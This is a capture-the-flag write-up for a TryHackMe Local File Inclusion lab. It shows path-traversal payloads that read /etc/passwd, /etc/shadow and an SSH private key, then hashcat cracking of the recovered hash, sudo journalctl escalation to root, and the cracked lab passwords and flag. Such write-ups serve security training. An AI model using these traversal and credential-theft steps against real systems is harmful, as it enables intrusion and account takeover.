CTF-Writeups/TryHackMe/LFI.md
2020-11-04 10:11:13 +05:00

11 KiB

TryHackMe-LFI

Abdullah Rizwan | 09:21 AM , 4th November ,2020

LFI

Local File Inclusion (LFI) is the vulnerability that is mostly found in web servers. This vulnerability is exploited when a user input contains a certain path to the file which might be present on the server and will be included in the output. This kind of vulnerability can be used to read files containing sensitive and confidential data from the vulnerable system.

The main cause of this type of Vulnerability is improper sanitization of the user's input. Sanitization here means that whatever user input should be checked and it should be made sure that only the expected values are passed and nothing suspicious is given in input. It is a type of Vulnerability commonly found in PHP based websites but isn't restricted to them.

Testing for LFI

To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like https://tryhackme.com/?file=robots.txt. Here file is the name of the parameter and robots.txt is the value that we are passing (include the file robots.txt).

Importance of Arbitrary file reading

A lot of the time LFI can lead to accessing (without the proper permissions) important and classified data. An attacker can use LFI to read files from your system which can give away sensitive information such as passwords/SSH keys; enumerated data can be further used to compromise the system.

In this task, we are going to find the parameter which is vulnerable to the Local File Inclusion attack. We will then will try to leverage information obtained to get access to the system.

Once we find the vulnerable parameter we can try to include the passwd file on the Linux system i.e /etc/passwd. The most common technique is path traversal method meaning we can include files like ../../../../etc/passwd what this does it get out of a directory like we usually do in Linux system by running cd ../

../../etc/passwd means to go out twice from the current working directory and then go to /etc directory and read the passwd file. Now the issue with this method is you need to be sure about the path of the file.

NMAP


Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:b9:f0:d3:e4:b3:17:9c:7f:b6:7d:28:72:8a:e4:77 (RSA)
|   256 07:f2:d9:85:77:74:52:2a:73:76:70:35:73:70:c3:9e (ECDSA)
|_  256 23:ba:e8:b6:8b:a2:ac:58:3b:f4:04:dc:6e:36:b7:f2 (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.6.9)
|_http-title: Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80

On visting web page

Try to navigate to different pages,and we see a parameter named page

The basic traversal for /etc/passwd in LFI is ../../../../etc/passwd but in this sceanrio ../../../etc/passwd is where LFI exists

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash sshd:x:110:65534::/run/sshd:/usr/sbin/nologin 

Now room tells us to read user falcon's private ssh key

Replacing /etc/passwd with /home/falcon/.ssh/id_rsa the path becomes ../../../home/falcon/.ssh/id_rsa and we can get the key

It is better to look it with the source code

Copy it in a new file and save it as id_rsa by changning it's permissions chmod 600

Logging in with SSH keeps failing because it needs his password so lets grab /etc/shadow to see his hash and crack it by going to ../../../etc/shadow

Hashcat

Use hashcat to crack sha512 hash , I came to know that it's a sha512 by looking at the fromat of it

hashcat -h | grep sha512
  21000 | BitShares v0.x - sha512(sha512_bin(pass))        | Raw Hash
   1710 | sha512($pass.$salt)                              | Raw Hash, Salted and/or Iterated
   1720 | sha512($salt.$pass)                              | Raw Hash, Salted and/or Iterated
   1740 | sha512($salt.utf16le($pass))                     | Raw Hash, Salted and/or Iterated
   1730 | sha512(utf16le($pass).$salt)                     | Raw Hash, Salted and/or Iterated
  20200 | Python passlib pbkdf2-sha512                     | Generic KDF
   6500 | AIX {ssha512}                                    | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating System
  21600 | Web2py pbkdf2-sha512                             | Framework
root@kali:~# hashcat -a 0 --user -m 1800 ^C
root@kali:~# cd TryHackMe/Easy/LFI
root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user -m 1800 hash /usr/share/wordlists/rockyou.txt

Here --user tells that your hash contains a username so you want it to be ignored After waiting for sometime it will show you this output

$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFV...yJ97k/
Time.Started.....: Wed Nov  4 09:45:38 2020 (30 secs)
Time.Estimated...: Wed Nov  4 09:46:08 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      625 H/s (12.84ms) @ Accel:16 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 18752/14344385 (0.13%)
Rejected.........: 0/18752 (0.00%)
Restore.Point....: 18688/14344385 (0.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidates.#1....: soldado -> ladeda


In order to show the password

root@kali:~/TryHackMe/Easy/LFI# hashcat -a 0 --user --show -m 1800 hash /usr/share/wordlists/rockyou.txt
falcon:$6$xQmTDVmT$hgSLG3ebs.8Tc/F4qqXNnvBBnG736EWpWKaprFVARjAsZ6JyoL4WaJdGv5.qddMWF4/MoJgN6Hekri8wyJ97k/:password09

Now we can login into the box

Running sudo -l to check what can we run as sudo

falcon@walk:~$ sudo -l
Matching Defaults entries for falcon on walk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falcon may run the following commands on walk:
    (root) NOPASSWD: /bin/journalctl
falcon@walk:~$ 


We can the user flag

drwxr-xr-x 5 falcon falcon 4096 Jan 30  2020 .
drwxr-xr-x 3 root   root   4096 Jan 28  2020 ..
lrwxrwxrwx 1 root   root      9 Jan 30  2020 .bash_history -> /dev/null
-rw-r--r-- 1 falcon falcon  220 Jan 28  2020 .bash_logout
-rw-r--r-- 1 falcon falcon 3771 Jan 28  2020 .bashrc
drwx------ 2 falcon falcon 4096 Jan 28  2020 .cache
drwx------ 3 falcon falcon 4096 Jan 28  2020 .gnupg
-rw------- 1 root   root     36 Jan 29  2020 .lesshst
-rw-r--r-- 1 falcon falcon  807 Jan 28  2020 .profile
drwxr-xr-x 2 root   root   4096 Jan 29  2020 .ssh
-rw-r--r-- 1 falcon falcon    0 Jan 29  2020 .sudo_as_admin_successful
-rw-r--r-- 1 falcon falcon   21 Jan 29  2020 user.txt
falcon@walk:~$ cat user.txt 
B8LEGIF049JT4RTVWUG4

On visting GTFOBINS we might be able to escalate privileges

Privilege Escalation

Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
Jan 28 19:00:21 walk kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
Jan 28 19:00:21 walk kernel: x86/fpu: xstate_offset[2]:  576, xstate_sizes[2]:  256
Jan 28 19:00:21 walk kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' form
Jan 28 19:00:21 walk kernel: e820: BIOS-provided physical RAM map:
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
Jan 28 19:00:21 walk kernel: BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
Jan 28 19:00:21 walk kernel: NX (Execute Disable) protection: active
Jan 28 19:00:21 walk kernel: random: fast init done
Jan 28 19:00:21 walk kernel: SMBIOS 2.5 present.
Jan 28 19:00:21 walk kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
Jan 28 19:00:21 walk kernel: Hypervisor detected: KVM
Jan 28 19:00:21 walk kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
!/bin/bash

root@walk:~# whoami
root
root@walk:~# id
uid=0(root) gid=0(root) groups=0(root)
root@walk:~# 

You could also priv esc by cracking root's password hash

root:$6$UVbVpBq4$O8f/Nk488RT95VcJpLl0WgwOuguU6kCRBVE3EHGHFviJJV9MNfb0GbK38WryIkx72d/DKh3HBprBYTcNJf0Xn0:hacking

And we are root ! We could have also read the root and user flag through LFI but its better this way